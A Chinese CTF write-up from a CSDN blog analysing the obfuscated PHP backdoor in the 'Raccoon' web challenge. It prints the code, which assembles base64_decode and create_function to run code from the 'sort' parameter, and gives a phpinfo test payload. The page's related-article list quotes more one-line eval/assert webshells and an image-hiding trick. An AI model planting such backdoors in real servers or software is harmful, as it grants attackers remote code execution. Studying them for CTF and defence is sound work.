Raccoon——(Web)PHP 后门分析writeup

最新推荐文章于 2022-08-07 23:13:45 发布
最新推荐文章于 2022-08-07 23:13:45 发布
阅读量287 收藏
点赞数
分类专栏: CTF 文章标签: CTF Raccoon Web php后门
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39480875/article/details/90415425
版权

题目
网页源代码如下:(我已经备注了很详细的注释)

<?php 
	$z0=$_REQUEST['sort'];
	$q1='';
	$c2="wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";
	$y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7);
	foreach($y3 as $h4){$q1.=$c2[$h4];}   //foreach循环    q1=base64_decode
	$v5=strrev("noi"."tcnuf"."_eta"."erc");  //strrev反转字符串  create_function('参数','函数体代码')函数主要用来创建匿名函数,
	$j6=$v5("",$q1($z0));    // j6 = create_function("",base64_decode(sort))
	$j6();   //空函数,就是在执行匿名函数的  函数体代码,要想执行phpinfo函数,于是要将    phpinfo();   进行 base64加密后 传给sort参数
	              //  sort=cGhwaW5mbygpOw==
//foreach (array_expression as $value)
//第一种:遍历给定的 数组语句 array_expression 数组。
//每次循环中,当前单元的值被赋给 $value 并且数组内部的指针向前移一步(因此下一次循环中将会得到下一个单元)。
//foreach (array_expression as $key => $value)
//第二种:同上,同时当前单元的键名也会在每次循环中被赋给变量 $key。	
	
	
	
?>
嗯哼哈嘿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web安全--文件上传漏洞--通用漏洞--PHP
weixin_68243135的博客
11-17 740
Web安全--文件上传--绕过--php
PHP调用erc20,调 用erc20
weixin_31934101的博客
03-21 484
...杠杆的ETH仓位将会上涨30%,但ETHBULL则增长更高。第1天,ETHBULL增长15%,之后调仓买入更多ETH;第2天则按其更高的新价格增长14.3%。此时3倍看涨仓位仅按原200美元ETH的价格进一步增加15%。因此在这两天期间,3倍杠杆的仓位增长15%+15%=30%,但ETHBULL是增长15%,另在新价格上增长14.3%,实际上增幅是31.4%。这种...知识:币看BITKAN...
第六届“蓝帽杯”全国大学生网络安全技能大赛-初赛Writeup
个人博客:https://www.mrzry.top
07-09 3764
第六届“蓝帽杯”全国大学生网络安全技能大赛-初赛Writeup
蓝帽杯2022年半决赛 writeup(附取证题目+解压密码+附件)
mumuzi的博客
08-05 8646
蓝帽杯半决赛火炬木wp
wha1e的博客
08-07 387
蓝帽杯半决赛火炬木wp
php上传后门,PHP图片后门藏匿攻略
weixin_42298973的博客
03-10 767
我们平时藏匿图片后门是什么流程呢?我们来看一下0x01 初级的藏匿方法:1、建立一个eval.php文件,上面加入我们的后门:Default12、找一张图片1.jpg,最好是从目标网站上下载下来的图片。3、合并图片和php后门:DefaultCopy /b C:\xampp\htdocs\images\1.jpg + C:\xampp\htdocs\images\eval.php C:\xampp...
raccoon_fox_tutorial.pdf
04-22
根据提供的文件内容,以下是关于使用Raccoon进行Autodock Vina虚拟筛选以及使用Fox进行筛选后数据分析的详细知识点说明。 知识点1:虚拟筛选概念 虚拟筛选是药物发现和开发过程中的一项关键步骤,它利用计算方法从...
raccoon_dataset.zip
08-20
"dataset" 和 "raccoon" 的标签揭示了其核心内容——一个包含浣熊图像的数据集,用于训练和测试算法对浣熊的识别能力。 浣熊数据集是计算机视觉领域中常见的实例,它由大量的浣熊图片组成,可能包括不同姿态、光照...
raccoon_dataset-master.rar
06-03
浣熊数据集(raccoon_dataset-master)是一个专门为 TensorFlow 物体识别训练设计的资源,包含 xml_to_csv.py 和 generator_tfrecord.py 两个关键脚本。这个数据集可以帮助开发者训练模型来识别浣熊这一特定对象,是...
raccoon
03-17
"raccoon"项目似乎是一个与HTML相关的开发项目,但提供的信息非常有限。... ...它的主要功能是定义网页内容的结构和样式,比如文本、图像、链接等...具体的项目细节需要查看压缩包中的"raccoon-main"文件才能进一步分析
raccoon4:APK下载的Google Play
02-04
Raccoon是APK下载器,用于从Google Play提取应用程序。 跨平台(Linux,Windows,Mac OS) 避免了将您的Android设备与Google帐户相关联而引起的隐私问题 在多个设备上轻松安装应用程序,而无需多次下载。 建造 ...
第四届“蓝帽杯”全国大学生网络安全 技能大赛 Writeup
algae
08-08 5515
第四届“蓝帽杯”全国大学生网络安全 技能大赛 WriteupMisc签到sudo熟悉的解密Web文件包含绕过easiestSQLiSoitgoesInclusionCryptozuc Misc 签到 观色 010editor查看,发现文件头是GIF89a,是gif文件 Stegsolve 调色道,出现前半flag ps打开,分离两个图层 Stegsolve分析,得到后半flag,即可得到完整flag sudo 喜欢玩数独吗,一起来玩吧。 nc 47.93.204.245 12000 1-9数字玩99
一个PHP混淆后门分析
weixin_30597269的博客
09-30 272
洒家的朋友的公司的某个站发现最近被上传了一个后门程序。为了取证我们抓取了HTTP请求流量,看到了一堆莫名其妙看似经过混淆的请求,响应也是看似base64的乱码。洒家用了2个小时静态分析了一遍,并写了利用脚本。后门程序看似是乱码,实际上经过了混淆,通过eval()可以执行任意PHP命令。由于混淆得很乱,做起来实在把洒家恶心了一番。 后门源代码: <?php /** * ...
2021第五届蓝帽杯初赛部分题目wp
qq_43678263的博客
04-29 5958
文章目录前言WEBBall_siginPWNslientMISC冬奥会_is_coming 前言 本次蓝帽杯初赛做出了三道解出人数最多的题,勉强混个线下。但不得不吐槽一下这届题目。冬奥会这题杂项套了100层娃,头都绕晕了;PWN题的slient是2020年蓝帽杯决赛原题。其他题没做出来,没有发言权。 WEB Ball_sigin 签到题,用手机打开,填补3次左上角空缺的单词,完成滑雪游戏即得到flag flag{3b2e48de-e328-4267-a8d6-8d17fb3c8889} PWN sl
上传脚本文件(一句话后门)WAF绕过(php)
weixin_43916797的博客
07-11 265
变量覆盖、 1.变量覆盖 要上传的脚本: <?php $a = $_GET['x']; $$a = $_GET['y']; $b(base64_decode($_POST['z'])); > phpinfo();转为base64为:cGhwaW5mbygpOw== url为:www.xxx.com?x=b&y=assert 传入的data: x= cGhwaW5mbygpOw== 2.加密混淆 将脚本文件加密 加密连接:http://phpjiami.com/phpjiami.html
PHP混淆后门解剖分析(反抓流量、加密结果)
publicStr的博客
06-09 2502
开始前的例行叨叨:这个后门样本收集于2018红帽杯线下决赛,看到有其他分析收集于自己的服务器,悲剧了(手动笑哭),貌似蓝帽杯也有。调试了很久,被逼着专门学了...
BUUCTF后门查杀
末初的CSDN博客
09-23 2655
题目地址:https://buuoj.cn/challenges#%E5%90%8E%E9%97%A8%E6%9F%A5%E6%9D%80 下载附件,使用webshell查杀工具:D盾 /include/include.php flag{6ac45fb83b3bc355c024f5034b947dd3}
PHP后门的一些用法
weixin_34302561的博客
09-04 380
今天我们说一些最常见的PHP后门的一些用法 首先,写一个最简单的后门,也可以叫做木马。 <?php eval($_GET['evl']); 就酱,你已经获得了这台服务器上的很多执行权限。那场景的用法有哪些呢? 打印服务器phpinfo http://www.test.com/a.php?evl=ph...
php上传后门,Dedecms疑似被植入后门 上传PHP后门可控制整个网站
weixin_28871989的博客
03-10 317
Admin5站长网2月21日消息,昨日乌云漏洞报告平台()发布漏洞报告,称国内知名开源CMS软件Dedecms被入侵种植后门,影响使用dedecms的网站和企业,后门代码在/include/shopcar.class.php中,希望直接使用dedecms又未作审计的网站速度处理。360网站安全检测官方微博称经过工程师的测试,可以上传PHP后门来控制整个网站。目前已经将该后门加入到webscan网站...
Nokia Mobile Web Server: 产品线介绍与技术概览
2. **Raccoon与Mobile Web Server的区别**:Raccoon作为开发版本,不断进行更新和优化,而Mobile Web Server是稳定的产品形态,具备完善的用户界面和管理功能。 3. **内容创建与服务器管理**:详细阐述了如何在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值